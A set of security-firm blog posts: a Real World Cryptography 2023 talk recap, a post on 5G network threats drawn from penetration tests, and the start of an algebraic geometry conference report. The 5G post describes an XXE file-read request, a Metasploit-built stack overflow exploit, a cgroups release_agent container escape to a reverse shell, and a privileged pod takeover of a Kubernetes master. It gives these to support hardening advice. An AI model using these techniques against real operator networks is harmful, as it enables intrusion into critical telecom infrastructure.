The first paper proposes a 2-out-of-n ECDSA scheme, whereas the second paper extends it to the t-out-of-n case. The DKLS 2-party multiplication algorithm is based on Oblivious Transfer (OT) together with a number of optimization techniques. The OT is batched, then further sped up by an OT Extension (a way to reduce a large number of OTs to a smaller number of OTs using symmetric key cryptography) and finally used to multiply in a threshold manner. An optimized variant of this multiplication algorithm is used in DKLS19 as well. The talk aimed to share the challenges that occur in practical development and deployments of the DKLS19 scheme, including:

  • The final protocol essentially requires three messages, however, the authors found they could pipeline the messages when signing multiple messages.
  • Key refreshing can be done efficiently, where refreshing means replacing the shares and leaving the actual key unchanged.
  • Round complexity was reduced to a 5-round protocol, reducing the time cost especially over WAN.
  • One bug identified by Roy in OT extensions did not turn out to apply for the DKLS implementations, however, the authors are still taking precautions and moving to SoftSpoken OT.
  • An error handling mistake was found in the implementation by Riva where an OT failure error was not propagated to the top.
  • A number of bug bounties around the improper use of the Fiat-Shamir transform were seen recently. If the protocol needs a programmable Random Oracle, every (sub) protocol instance needs a different Random Oracle, which can be done using unique hash prefixes.

The talk also discussed other gaps between theory and practice: establishing sessions, e.g., whether O(n2) QR code scans required to set up the participant set.

Aleksandar Kircanski

The Path to Real World FHE: Navigating the Ciphertext Space

Shruthi Gorantala from Google presented The Path to Real World FHE: Navigating the Ciphertext Space. There was also an FHE workshop prior to RWC where a number of advances in the field were presented. Fully Homomorphic Encryption (FHE) allows functions to be executed directly on ciphertext that ends up with the same encrypted results if the functions were run on plaintext. This would result in a major shift in the relationship between data privacy and data processing as previously an application would need to decrypt the data first. Therefore, FHE removes the need for the decryption and re-encryption steps. This would help preserve end-to-end privacy and allow users to have additional guarantees such as cloud providers not having access to user’s data. However, performance is a major concern as performing computations on encrypted data using FHE still remains significantly slower than performing computations on the plaintext. Key challenges for FHE include:

  • Data size expansion,
  • Speed, and
  • Usability.

The focus of the presentation was on presenting a model of FHE hierarchy of needs that included both deficiency and growth needs. FHE deficiency needs are the following:

  • FHE Instruction Set which focuses on data manipulation and ciphertext maintenance.
  • FHE Compilers and Transpilers which focuses on parameter selection, optimizers and schedulers.
  • FHE Application Development which focuses on development speed, debugging and interoperability.

The next phase would be FHE growth needs:

  • FHE Systems Integration and Privacy Engineering which includes threat modeling.
  • FHE used a critical component of privacy enhancing technologies (PETs).
  • A key current goal for FHE is reduce the computational overhead for an entire application to demonstrate FHE’s usefulness in practical real-world settings.

Javed Samuel

High-Assurance Go Cryptography in Practice

Filippo Valsorda, the maintainer of the cryptographic code in the Go language since 2018, presented the principles at work behind that maintenance effort. The title above is from the RWC program, but the first presentation slide contained an updated title which might be clearer: “Go cryptography without bugs”. Indeed, the core principle of it is that Filippo has a well-defined notion of what he is trying to achieve, that he expressed in slightly more words as follows: “secure, safe, practical, modern, in this order”. This talk was all about very boring cryptography, with no complex mathematics; at most, some signatures or key exchanges, like we already did in the 1990s. But such operations are what actually gets used by applications most of the time, and it is of a great practical importance that these primitives operate correctly, and that common applications do not misuse them through a difficult API. The talk went over these principles in a bit more details, specifically about:

  • Memory safety: use of a programming language that at least ensures that buffer overflows and use-after-free conditions cannot happen (e.g., Go itself, or Rust).
  • Tests: many test vectors, to try to exercise edge cases and other tricky conditions. In particular, negative test vectors are important, i.e., verifying that invalid data is properly detected and rejected (many test vector frameworks are only functional and check that the implementation runs correctly under normal conditions, but this is cryptography and in cryptography there is an attacker who is intent on making the conditions very abnormal).
  • Fuzzing: more tests designed by the computer trying to find unforeseen edge cases. Fuzzing helps because handcrafted negative test vectors can only check for edge conditions that the developer thought about; the really dangerous ones are the cases that the developer did not think about, and fuzzing can find some of them.
  • Safe APIs: APIs should be hard to misuse and should hide all details that are not needed. For instance, when dealing with elliptic curves, points and scalars and signatures should be just arrays of bytes; it is not useful for applications to see modular integers and finite field elements and point coordinates. Sometimes it is, when building new primitives with more complex properties; but for 95% of applications (at least), using a low-level mathematics-heavy API is just more ways to get things wrongs.
  • Code generation: for some tasks, the computer is better at writing code than the human. Main example here is implementation of finite fields, in particular integers modulo a big prime; much sorrow has ensued from ill-controlled propagation of carries. The fiat-crypto project automatically generates proven correct (and efficient) code for that and Go uses said code.
  • Low complexity: things should be simple. The more functions an API offers, the higher the probability that an application calls the wrong one. Old APIs and primitives, that should normally no longer be used in practice, are deprecated; not fully removed, because backward compatibility with existing source code is an important feature, but still duly marked as improper to use unless a very good reason to do so is offered. Who needs to use plain DSA signatures or the XTEA block cipher nowadays? Some people do! But most are better off not trying.
  • Readability: everything should be easy to read. Complex operations should be broken down into simpler components. Readability is what makes it possible to do all of the above. If code is unreadable, it might be correct, but you cannot know it (and usually it means that it is not correct in some specific ways, and you won’t know it, but some attacker might).

An important point here is that performance is not a paramount goal. In “secure, safe, practical, modern”, the word “fast” does not appear. Cryptographic implementations have to be somewhat efficient, because “practical” implies it (if an implementation is too slow, to the point that it is unusable, then it is not practical), but the quest for saving a few extra clock cycles is pointless for most applications. It does not matter whether you can do 10,000 or 20,000 Ed25519 signatures per second on your Web server! Even if that server is very busy, you’ll need at most a couple dozen per second. Extreme optimization of code is an intellectually interesting challenge, and in some very specialized applications it might even matter (especially in small embedded systems with severe operational constraints), but in most applications that you could conceivably develop in Go and run on large computers, safety and practicality are the important features, not speed of an isolated cryptographic primitive.

Thomas Pornin

Real World Cryptography 2024

NCC Group’s Cryptography Services team boasts a strong Canadian contingent, so we were excited to learn that RWC 2024 will take place in Toronto, Canada on March 25–27, 2024. We look forward to catching up with everyone next year!

5G security – how to minimise the threats to a 5G network

28 August 2023 at 01:00

To ensure security of new 5G telecom networks, NCC Group has been providing guidance, conducting code reviews, red team engagements and pentesting 5G standalone and non-standalone networks since 2019. As with any network various attackers are motivated by different reasons. An attacker could be motivated to either gain information about subscribers on an operator’s network by targeting signalling, accessing the customers private data such as billing records, taking control over the management network or taking down the network. In most cases, the main avenue of attack is via the management layer into the core network – either utilising the operator’s support personnel or via the 3rd party vendor. In all cases attacking a 5G network will take a number of weeks or months, with the main group of attackers being Advanced Persistent Threat (APT) groups. Many governments around the world including the UK government are legislating and demanding operators and vendors reduce telecoms security gaps to ensure a resilient 5G network.

But many operators are unclear on the typical threats and how they could affect their business or if they do at all. Many companies are understandably investing significant time and effort into testing and reviewing threats to make sure they adhere to the compliance requirements.

Here, we aim to cover some of the main issues we have discovered during our pentesting and consultancy engagements with clients and explain not only what they are but how likely the threat is to disrupt the 5G network.

Background

Any typical 5G network deployment be it a Non Standalone (NSA) or Standalone (SA) core, can have various security threats or risks associated with it. These threats can be exploited by either known (i.e. default credentials) or unknown vulnerabilities (i.e. zero day). Primarily the main focus of any attack is via the existing core management network, be it via a malicious insider or an attacker who has leveraged access to a suitably high level administrator account or utilising default credentials. We have seen this first hand with red teaming attacks against various operators. Secondary attack vectors are via insecure remote sites hosting RAN infrastructure, which in turn allow access to the core network utilising the management network. Various mechanisms (i.e. firewalls, IDS etc) are put in place to manage these risks but vulnerable networks and systems have to be tested thoroughly to limit attacks. Having a good understanding of the 5G network topology and associated risks/threats is key and NCC Group has the necessary experience and knowledge to scope and deliver this testing.

Typical perceived threats and severity if compromised are illustrated below. The high risk vector is via the corporate and vendor estate, medium risk vectors via the external internet and rogue operators and low risk vector via the RAN edge nodes. This factors in ease of access plus the degree of severity should an attacker leverage access. For example, if an attacker was to gain access to the corporate network and suitable credentials to access the cloud network equipment running the 5G network, that would have a high level impact if a DoS attack was conducted. This is opposed to an attacker leveraging access to a RAN edge node to conduct a DoS attack, where the exposed risks would be limited to the cell site in question.

“Attack scenarios against a typical 4G/5G mobile network”

So a bit of background on 5G. A 5G NSA network consists of a 5G OpenRAN deployment or a gNodeB utilising a 4G LTE core. A 5G StandAlone (SA) network consists of a 5G RAN (Radio Access Network) plus a 5G core only. Within an NSA deployment, a secondary 5G carrier is provided in addition to the primary 4G carrier. A 5G NSA user equipment (UE) device connects first to the 4G carrier before also connecting to the secondary 5G carrier. The 4G anchor carrier is used for control plane signalling while the 5G carrier is used for high-speed data plane traffic. This approach has been used for the majority of commercial 5G network deployments to date. It provides improved data rates while leveraging existing 4G infrastructure. The main benefits of 5G NSA are an operator can build out a 5G network on top of their existing 4G infrastructure instead of investing in a new, costly 5G core, the NSA network uses 4G infrastructure which operators are already familiar with and deployment of a 5G network can be quicker by using the existing infrastructure. A 5G SA network helps reduce latency, improves network performance and has centrally controlling network management functions. The 5G SA can deliver new essential 5G services such as network slicing, allowing multiple tenants or networks to exist separate from each other on the same physical infrastructure. While services like smart meters require security, low power and high reliability are more forgiving with respect to latency, others like driver-less cars may need ultra-low latency (URLLC) and high data speeds. Network slicing in 5G supports these diverse services and facilitates the efficient reassignment of resources from one virtual network slice to another. However, the main disadvantage of implementing a 5G SA network is the cost to implement and training of staff to learn and configure correctly all parts of the new 5G SA core infrastructure.

A OpenRAN network allows deployment of a Radio Access Network (RAN) with vendor neutral hardware or software. The interfaces linking components use open interface specifications between the components (eg RU/DU/CU) plus with different architecture options. A Radio Unit (RU) is used to handle the radio link and antenna connectivity, a Distributed unit (DU) is used to handle the baseband protocols and interconnections to the Centralised Unit (CU). The architecture options include RAN with just Radio Units (RU) and Base Band units (BBU), or split between RU,DU,CU. Normally the Radio Unit is a physical amplifier device connected over a fibre or coaxial link to a DU component that is normally virtualised. A CU component is normally located back in a secure datacentre or exchange and provides the eNodeB/gNodeB connectivity into the core. In most engagements we have seen the use of Kubernetes running DU/CU pods as docker containers on primarily Dell hardware, with a software defined network layer linking into the 5G core.

In 5G a user identity (i.e. IMSI) is never sent over the air in the clear. On the RAN/edge datacentre the control and user planes are encrypted over air and on the wire (i.e. IPSEC), with 5G core utilising encrypted and authenticated signalling traffic. The 5G network components have externally and internally exposed HTTP2 Service Based Interface (SBI) APIs and provide access directly to the 5G core components for management, logging and monitoring. Usually the SBI interface is secured using TLS client and server certificates. The network can now support different tenants by implementing network slices, with the Software Defined Networking (SDN) layer isolating network domains for different users.

So what are the main security threats?

Shown below is a high level overview of a 5G network with a summary of threats. A radio unit front end containing the gNodeB (i.e. basestation) handles interconnects to the user equipment (UE). A RU/DU/CU together form the gNodeB. The midhaul (i.e. Distributed Unit) handles the baseband layer to the RU over the fronthaul to the midhaul Centralised Unit (CU). The DU does not have any access to customer communications as it may be deployed in unsupervised sites. The CU and Non-3GPP Inter Working Function (N3IWF), which terminates the Access Stratum (AS) security, will be deployed in sites with more restricted access. The DU and CU components can be collocated or separate, usually running as virtualised components within a cluster on standard servers. To support low latency applications, Multi-Access Edge computing (MEC) servers are now being developed to reduce network congestion and application latency to users by pushing the computing resources, including storage, to the edge of the network collocating them with the front RF equipment. The MEC offers application developers and content providers cloud computing capabilities and an IT service environment at the edge of the external data network to provide processing capacity for high demand streaming applications like virtual reality games as well as low latency processing for driverless cars. All links are connected over Nx links. The main threats against the DU/CU/MEC components are physical attacks against the infrastructure either to cause damage (ie arson) or to compromise the operating system to glean information about users on the RAN signalling plane. In some cases, attacking the core via these components by compromising management platforms is also possible. Targeting the MEC by a poorly configured CI/CD pipeline and the ingest of malicious code could also be a threat.

The N1/N2 link carrying the NAS protocol provides mobility management and session management between the User equipment (UE) and Access and Mobility Management Function (AMF). It is carried over the RRC protocol to/from the UE. A User Plane Function (UPF) is used as a router of user data connections. The Core Network consists of an AMF, a gateway to the core network, which talks to the AUSF/UDM to authenticate the handset with the network, plus the network also authenticates using a public key with the handset. In the core network all components including a lot of legacy 4G components are now virtualised, running as Kubernetes pods, with worker nodes running on either custom cloud environment or an opensource instance like Openstack.  Targeting the 5G NFVI or mobile core cloud via the corporate access is a likely attack vector, either disrupting the service by a DoS attack or acquiring billing data. Similar signalling attacks as in 4G are now prevalent in 5G, due to the same 4G components and associated protocols (ie. SS7, DIAMETER, GTP) being collocated with 5G components, utilising the legacy 4G network to provide service for the 5G network. Within 5G, HTTP/2 SBI interfaces are now in use between the core components (ie AMF/UPF etc), however due to no or poor encryption it is still possible to either view this traffic or query APIs directly. The diagram below illustrates the various threats against a typical 5G deployment. A full more compromise hiearchy of threats are detailed within the Mitre FiGHT attack framework.

“Threats against a typical 5G network”

Reducing the vulnerabilities will decrease the risks and threats an operator will face. However, there is a fine line between testing time and finding vulnerabilities, and we can never guarantee we have found all the issues with a component. When scoping pentesting assessments, we always start with the edge and work our way into the centre of the network, trying to peel away the layers of functionality to expose potential security gaps. The same testing methodology applies to any network, but detailed below are some of the key points that we cover when brought into consult on 5G network builds.

Segment, restrict and deny all

Simple idea – if an attacker cannot see the service or endpoint then they cannot leverage access to it. A segmented network can improve network performance by containing specific traffic only to the parts of the network that need to see it. It can help to reduce attack surface by limiting lateral movement and preventing an attack from spreading. For example, segmentation ensures malware in one section does not affect systems in another. Segmentation reduces the number of in-scope systems, thereby limiting costs associated with regulatory compliance. However, we still see poor segmentation during engagements, where it was possible to directly connect to management components from the corporate operator network. Implementing VLANs to segment a 5G network is down to the security team and network architects. When considering a network architecture, segmenting the management network from signalling and user data traffic is key. Limiting access to the 5G core, NFVI services and exposed management to a small set of IP ranges using robust firewall rules with an implicit “deny all” statement is required. The Operations Support System (OSS) and Business Support Systems (BSS) are instrumental in managing the network but if not properly segmented from the corporate network can allow an unauthenticated attacker to leverage access to the entire 5G core network. Implementing robust role based access controls and multi-factor access controls to these applications is key, with suitably hardened Privileged Access Workstations (PAW) in place, with access closely monitored. Do not implement a secure 5G core but then allow all 3rd party vendors access to the entire network. Limit access using the principle of least privilege – should vendor A have access by default to vendor B’s management system? The answer is a clear no.

Limit access to the underlying network switches and routers – be sure to review the configuration of the devices and review the firmware versions. During recent 5G pentesting we have discovered poor default passwords for privileged accounts still in use, allowing access to network components, plus even end of support switch and router firmware. If an attacker was able to leverage access to the underlying network components any virtualised cloud network could be simply removed from the rest of the enterprise network. Within the new 5G network, software-defined networking (SDN) is used to provide greater network automation and programmability through the use of a centralised controller. However, the SDN controller provides a single point of failure and must have robust security policies in place to protect it. Check the configuration of the SDN controller software. Perhaps it is a java application with known vulnerabilities. Or is there an unauthenticated northbound REST API exposed to everyone in the enterprise network? Has the SDN controller OS not been hardened – perhaps no account lockout policy and default/weak SSH credentials used?

In short follow a zero trust principle when designing 5G network infrastructure.

Secure the exposed management edge

An attacker will likely enable access to the corporate network first before horizontally pivoting into the enterprise network via a jumpbox. So secure any services supplying access to the 5G core either at the NFVI application layer such as hardware running the cloud instance, the exposed OSS/BSS web applications or any interconnects (i.e. N1/N2 NAS) back to the core. Limit access to the exposed web applications with strong Role Based Access Controls (RBAC) and monitor access. Use a centralised access management platform (i.e. CyberARK) to control and police access to the OSS/BSS platforms. If you have to expose the cloud hardware processing layer to users (i.e. Dell iDRAC/HP iLO), don’t use default credentials or limit the recovery of remote password hashes. Exposing these underlying hardware control layers to multiple users due to poor segmentation could lead to an attacker conducting a DoS attack by simply turning off servers within the cluster and locking administrators out of the platforms used to manage services.

The myriad of exposed web APIs used for monitoring or control are also a vector for attack. During a recent engagement we discovered an XML External Entity Injection (XXE) vulnerability within an exposed management API and it was possible for an authenticated low privileged attacker to use a vulnerability in the configuration of the XML processor to read any file on the host system.

It was possible to send crafted payloads to the endpoint OSS application located at https://10.1.2.3/oss/conf/ and trigger this vulnerability, which would allow an attacker to:

  • Read the filesystem (including listing directories), which ended in getting a valid user to log into the server running the API alongside the credentials to successfully log into the SSH service of the mentioned machine.
  • Trigger Server Side Request forgery.

The resulting authenticated XXE request and response is illustrated below:

Request

POST /oss/conf/blah HTTP/1.1
Host: 10.1.2.3:443
Cookie: JSESSIONID=xxxxxx
[…SNIP…]
<!DOCTYPE root []<nc:rpc xmlns:……..
none test;

Response

HTTP/1.1 200
error-message xml:lang=”en”>/edit-someconfig/default: “noneroot:x:0:0:root:/
root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin
user:x:1000:0::/home/user:/bin/bash

Using this XXE vulnerability, it was possible to read a properties file and recover LDAP credential information and then SSH directly into the host running the API server. In this particular case, once on the host running the containerised web application, the user could read all encrypted password hashes that were stored on the host, utilising the same decryption process and poorly stored key values that were used to encrypt the hashes. The same password was used for the root account and allowed for trivial privileged escalation to root. With the root access to the running API server, which in turn was a docker container running as a Kubernetes pod, it was possible to leverage a vulnerability with the Kubernetes configuration to compromise the container and escalate privileges to the underlying cluster worker node host. To prevent this type of escalation a defense in depth approach is paramount on any Linux host plus on any containers. More on this below.

Implement exploit mitigation measures on binaries

If you expose a service externally be sure to check it is compiled with exploit mitigation measures. Exploitation can be significantly simplified due to the manner in which any service/binary has been built. If a binary has an executable stack, and lacks any modern exploit mitigations such as ASLR, NX, stack cookies, hardened C functions, etc, then an attacker can utilise any issues they might find such as a stack buffer overflow, to get remote code execution (RCE) on the host. This was discovered whilst testing a 5G instance and an exposed sensitive encrypted and proprietary service. This service was exposed externally to the enterprise network, and after a brief analysis showed that it was likely a high risk process due to –

• It was exposed on all network interfaces, making it reachable across the network
• It ran as the root user
• It was built with an executable stack, and no exploit mitigations
• It used unsafe functions such as memcpy, strcat, system, popen etc.

The service took a simple encrypted stream of data that was easily decrypt-able into a configuration message. Analysis of the message/data stream showed an issue with how the buffer data was stored and it was possible to trigger a memory corruption via a stack buffer overflow. After decompiling the binary using Ghidra, it was clear one important value was not used as an input to the function processing a certain string of data making up the configuration message – the size of the buffer used to store the parts of the string. Many of the instances where the function was used were safe due to the size and location of the target buffers. However, one of the elements of the message string was split into 12 parts, the first of which was stored in a short buffer (20 bytes in length) that was located at the end of the stack frame. Due to its length it was possible to overwrite data that was adjacent to the buffer, and due to the buffer’s location, this was the saved instruction pointer. When the function completed, the saved instruction pointer was used to determine where to continue execution. As the attacker could control this value they could take control over the process’s execution flow.

Knowing how to crash the stack it was possible using Metasploit to determine the offset of the instruction pointer and to determine how much data could be written to the stack. As the stack was executable it was straightforward to find a ROP gadget that would perform the command ‘JMP ESP’. An initial 100 byte payload was generated using Metasploit (pattern_create.rb). This was used to find the offset to over write the instruction pointer, using the Metasploit pattern_offset.rb script. The shellcode was generated by Metasploit and simply created a remote listener on port 5600. The shellcode was written to the stack after the bytes that control the instruction pointer.

To find and generate suitable exploit code took around 5-10 days work and would require an attacker with good reverse engineering skills. This service was running as root on the 5G virtualised network component, and due to the virtualised component accesses within the 5G network, could have been leveraged by attacker to compromise all other components. During this review the AFL fuzzer was used to determine any other locations within the input stream that could potentially cause a crash. A number of crashes were found revealing multiple issues with the binary.

“Running AFL fuzzer against the target binary”

To illustrate this issue further please read our blog posts Exploit the Fuzz – Exploiting Vulnerabilities in 5G Core Networks. In this particular opensource case, exposing “external” protocols and associated services like the UPF component on a remotely hosted server, not directly within in the 5G core could be leveraged by attacker to compromise a server (ie SMF) within the 5G core. It is important to bear this in mind when deploying equipment out to the end of the network. Physical access to the component, even when within a roadside cabinet or semi-secure location such as an exchange is possible, allowing an attacker to leverage access to the 5G core via a not so closely monitored signalling or data plane service. This is more prevalent now with the deployment of OpenRAN components, where multiple services (RU,DU,CU) are now potentially exposed.

Secure the virtualised cloud layer

All 5G core run on a virtualised cloud system being a custom built environment or from a separate provider such as VMWare. The main question is can an attacker break out of one container or pod to compromise other containers or potentially other clusters? It might even be possible for an attack to exploit the underlying hypervisor infrastructure if suitably positioned. There are multiple capabilities assigned to a running pod/container – privileged containers, hostpid, sysadmin, docker.sock, hostpath, hostnetwork – that could be overly permissive so allowing an attacker to leverage a feature to mount the underlying host cluster file system or to take full control over the Kubernetes host. We have also seen issues with kernel patching with a kernel privileged escalation vulnerability leveraged to breakout of a container.

During recent testing, applying security controls on the deployment of pods in the cluster were not managed by an admission controller. This meant that privileged containers, containers with the node file system mounted, containers running as root users, and containers with host facilities, could be deployed. This would enable any cluster user or principal with pod deployment privileges to compromise the cluster, the workloads, the nodes, and potentially gain access to the wider 5G environment.

The risk to an operator is that any developer with deployment privileges, even to a single namespace, can compromise the underlying node and then access all containers running on that node – which may be from other namespaces they do not have direct privileges for, breaking the separation of role model in use.

Leveraging a vulnerability such as the previous XXE issue or brute forcing SSH login credentials to a Docker container running with overly permissive capabilities has been leveraged on various engagements and is illustrated below.

“Container breakout via initial XXE vulnerability”

As mentioned it was possible to recover ssh credentials with a XXE vulnerability. Utilising the SSH access an escalating to root permissions on the container, it was possible to abuse a known issue with cgroups to perform privilege escalation and compromise the nodes and cluster from an unprivileged container. The Linux kernel does not check that the process setting the cgroups release_agent file has correct administrative privileges – the CAP_SYS_ADMIN capability in the root namespace , and so an unprivileged container that can create a new namespace with a fake CAP_SYS_ADMIN capability through unshare, could force the kernel to execute arbitrary commands when a process completed.


It was possible to enter a namespace with CAP_SYS_ADMIN privileges, and use the notify_on_release feature of cgroups, that did not differentiate between root namespace CAP_SYS_ADMIN and user namespace CAP_SYS_ADMIN, to execute a shell script with root privileges on the underlying host. A syscall breakout was used to execute a reverse shell payload with cluster admin privileges on the underlying cluster host. This is shown below:

“Container breakout utilising cgroups”

Once a shell was created on the underlying kubernetes cluster host, it was then possible to SSH directly to the RAN cluster due to credentials seen in backup files and exploit any basestation equipment. It was also possible to leverage weak security controls on the deployment of pods in the cluster since there was no admission controller. As this exploited cluster user had pod deployment privileges, it was possible to deploy a manifest specifying a master node for the pod to be deployed to, the access gained was root privileges on a master node. This highly privileged access enabled compromise of the whole cluster through gaining cluster administer privileges from a kubeconfig file located on the node filesystem.

As a proof of concept attack, the following deployment specification can be used to target the master node by chroot’ing to the underlying host :

“Deploying a bad pod to gain access to master node”

With the kubeconfig file from the master node it is then possible to read all namespaces on the cluster. It would also be possible from the master node to access the underlying hypervisor or virtualisation platform. We have also had in some cases due to discovered credentials, the ability to log directly into the VSphere client and disable hosts.

Strict enforcement of privilege limitations is essential to ensuring that users, containers, and services cannot bridge the containerisation layers of container, namespace, cluster, node, and hosting service. It should be noted that if only a small number of principals have access to a cluster, and they all require cluster administration privileges then, a cluster admin could likely modify any admission controller policies. However, best practice is to implement business policies and enforce the blocking of containers with weak security controls. Equally, if more roles are included with the administration model at a later date, then the likelihood of value in implementing admission controllers increases. In short the main recommendation is to ensure appropriate privilege security controls are enforced to prevent deployments having access or the ability to compromise other layers of the orchestration model. Consider implementing limitations to which worker nodes containers can deploy, and insecure manifest configurations can be deployed.

Scan, verify, monitor and patch all images regularly

It is important when deploying virtualised container images to check regularly for any changes to the underlying OS, audit any events such as login events plus patch all critical vulnerabilities as soon as possible. Basic vulnerability management is key – identifying and prevent risks to all the hosts, images and functions. Scanning images before they are deployed should be done by default on a regular interval.

For instance, if a Kubernetes cluster is utilising a Harbor registry, simply enabling vulnerability scanning “Automatically scan images on push” with a suitable tool such as Trivy with a regularly updated set of vulnerabilities will suffice. Even preventing vulnerable images from running is possible for images with a certain severity. Implement signed images or content trust also gives you the ability to verify both the integrity and the publisher of all the data received from a registry over any channel.

“Setting harbor to automatically scan images”

Enforce with tighter contracts with vendors the need to supply patches to images quicker and verify as much as possible all patches have had no change to the underlying functionality. Enforcing the use of harden Linux OS images is best practice, utilising CIS benchmarks scans to verify OS images have been hardened. This is also important on the underlying cluster hosts. Our recommendation is to move security back to the developer or vendor with a secure Continuous Integration and Continuous Development (CI/CD) pipeline with Open Policy Agent integrations to secure workloads across the Software Development Life Cycle (SDLC). NCC Group conducts regular reviews of CI/CD pipelines and can help you understand the issues. Please check out 10 real world stories of how we’ve compromised ci/cd pipelines for further details.

If possible get a software build of materials (SBOM) from vendors. SBOM is an industry best practice part of secure software development that enhances the understanding of the upstream software supply chain, so that vulnerability notifications and updates can be properly and safely handled across the installed customer base. The SBOM documents proprietary and third-party software, including commercial and free and open source software (FOSS), used in software products. The SBOM should be maintained and used by the software supplier and stored and viewed by the network operator. Operators should be periodically checking against known vulnerability databases to identify potential risk. However, the level of risk for a vulnerability should be determined by the software vendor and operator with consideration of the software product, use case, and network environment.

Once an image is running, verifying the running services is key with some kind of runtime defences. This will entail implementing strong auditing utilising auditd and syslog to monitor kernel, process and access logs. We have seen no use of this service plus no use of any antivirus. Securing containers with Seccomp and either AppArmor or SELinux would be enough to prevent container escape. Taking all the logging data into a suitable active defence engine could allow for more predictive and threat-based active protection for running containers. Predictive protection could include capabilities like determining when a container runs a process not included in the origin image or creates an unexpected network socket. Threat-based protection includes capabilities like detecting when malware is added to a container or when a container connects to a botnet. Utilising a machine learning model to create a model for each running container in the cluster is highly recommended. Applied intelligence used for monitoring log data is key for any threat prevention, aiding in the SOC identifying quickly key 5G attack vectors.

Implement 5G security functions

Previous generations of cellular networks failed on providing confidentiality/integrity protection on some pre-authentication signalling messages, allowing attackers to exploit multiple vulnerabilities such as IMSI sniffing or downgrade attacks to 5G. The 5G standard facilitates a base level of security with various security features. However, we have seen during engagements these are not enabled.

The 5G network uses data encryption and integrity protection mechanisms to safeguard data transmitted by the enterprise, prevent information leakage and enhance data security for the enterprise. Not implementing these will compromise the confidentiality, integrity and availability (CIA).

5G introduces novel protection mechanisms specifically designed for signalling and user data. 5G security controls outlined in 3GPP Release 15 include:

• Subscriber permanent identifier (SUPI) – a unique identifier for the subscriber
• Dual authentication and key agreement (AKA)
• Anchor key is used to identify and authenticate UE. The key is used to create secure access throughout the 5G infrastructure
• X509 certificates and PKI are used to protect various non-UE devices
• Encryption keys are used to demonstrate the integrity of signalling data
• Authentication when moving from 3GPP to non-3GPP networks
• Security anchor function (SEAF) allows reauthentication of the UE when it moves between different network access points
• The home network carries out the original authentication based on the home profile (home control)
• Encryption keys will be based on IP network protocols and IPSec
• Security edge protection proxy (SEPP) protects the home network edge
• 5G separates control and data plane traffic

Besides increasing the length of the key algorithms (to 256-bit expected for future 3GPP releases), 5G forces mandatory integrity support of the user plane, and extends confidentiality and integrity protection to the initial NAS messages. The table below summarises in various columns the standard requirements in terms of confidentiality and integrity protection as defined in the 3GPP specs. 5G also secures the UE network capabilities, a field within the initial NAS message, which is used to allow UEs to report to the AMF about the supported integrity and encryption algorithms in the initial NAS message.

In general there has been an increase in the number of security features in 5G to address issues found with the legacy 2G, 3G and 4G network deployments and various published exploits. These have been included within the different 3GPP specifications and adopted by the various vendors. It should be noted that a lot of the security features are optional and the implementation of these is down to the operator rather than the vendor.

The only security features that are defined as mandatory within the 5G standards are integrity checking of the RRC/NAS signalling plane and on the IPX interface the mandatory use of a Security Edge Protection Proxy (SEPP). The SUPI encryption is optional but in the UK this is required due to GDPR.

“Table illustrating various 4G / 5G security functions”

As shown, the user plane integrity protection is still optional so still in theory vulnerable to attack such as malicious redirect of traffic using a DNS response. Some providers now by default turn on the new integrity protection feature for the user plane and prevent an attacker forcing the network to use a less secure algorithm. In 4G, a series of GRX firewalls are in place to limit attacks via the IPX network but due to the use of HTTPS in 5G control messages a new SEPP device is mandated to allow matching of control and user plane sessions.

By collecting 5G signalling traffic it is possible to check implementations and analyse the vulnerabilities. NCC Group conducts these assessments and advises clients on implementing various optional security features either related to 5G or with other legacy systems such as enabling A5/4 algorithm on GSM networks. This issue is illustrated clearly within the paper European 5G Security in the Wild: Reality versus Expectations. This paper highlights the issues with no concealment of permanent identifiers and the fact it was possible to capture the permanent IMSI and IMEI values, which are sent without protection within the NAS Identity Response message. Issues with the temporary identifier and GUTI refresh have also been observed. After receiving the NAS Attach Accept and RRC Connection Request messages, the freshness of m-TMSI value was not changed, only changing during a Registration procedure. This would allow TMSI tracking and possible geolocation of 5G user handsets.

As 5G networks become more mature and deployments progress to full 5G SA deployments, it is likely issues affecting the network will be addressed. However, it is important to implement and test these new security features as soon as possible to prevent a compromise.

Summary

The 5G network is a complex environment, requiring methodical comprehensive reviews to secure the entire stack. Often a company may lack the time, specialist security knowledge, and people needed to secure their network. Fundamentally, a 5G network must be configured properly, robustly tested and security features enabled.

As seen from above, most compromises have the following root causes or can be traced back to:

• Lack of segmentation and segregation
• Default configurations
• Over permissive permissions and roles
• Poor patching
• Lack of security controls

SIAM AG23: Algebraic Geometry with Friends

29 August 2023 at 09:00

I recently returned from Eindhoven, where I had the pleasure of giving a talk on some recent progress in isogeny-based cryptography at the SIAM Conference on Applied Algebraic Geometry (SIAM AG23). Firstly, I want to thank Tanja Lange, Krijn Reijnders and Monika Trimoska, who orgainsed the mini-symposium on the application of isogenies in cryptography, as well as the other speakers and attendees who made the week such a vibrant space for learning and collaborating.

As an overview, the SIAM Conference on Applied Algebraic Geometry is a biennial event which aims to collect together researchers from academia and industry to discuss new progress in their respective fields, which all fall under the beautiful world of algebraic geometry. Considering the breadth of algebraic geometry, it is maybe not so surprising that the conference is then filled with an eclectic mix of work, with mini-symposia dedicated to biology, coding theory, cryptography, data science, digital imaging, machine learning and robotics (and much more!).

In the world of cryptography, algebraic geometry appears most prominently in public-key cryptography, both constructively and in cryptanalysis. Currently in cryptography, the most widely applied and studied objects from algebraic geometry are elliptic curves. The simple, but generic group structure of an elliptic curve together with efficient arithmetic from particular curve models has made it the gold standard for Diffie-Hellman key exchanges and the protocols built on top of this. More recently, progress in the implementation of bilinear pairings on elliptic curves has given a new research direction for building protocols. For an overview of pairing-based cryptography, I have a blog post discussing how we estimate the security of these schemes, and my colleague Eric Schorn has a series of posts looking at the implementation of pairing-based cryptography in Haskell and Rust.

Despite the success of elliptic curve cryptography, Shor’s quantum polynomial time algorithm to solve the discrete logarithm problem in abelian groups means a working, “large-enough”, quantum computer threatens to break most of the protocols which underpin modern cryptography. This devastating attack has led to the search for efficient, quantum-safe cryptography to replace the algorithms currently in use. Mathematicians and cryptographers have been searching for new cryptographically hard problems and building protocols from these, and algebraic geometry has again been a gold mine for new ideas. Our group effort since Shor’s paper in 1995 has lead to exciting progress in areas such as multivariate, code-based, and my personal favourite, isogeny-based cryptography.

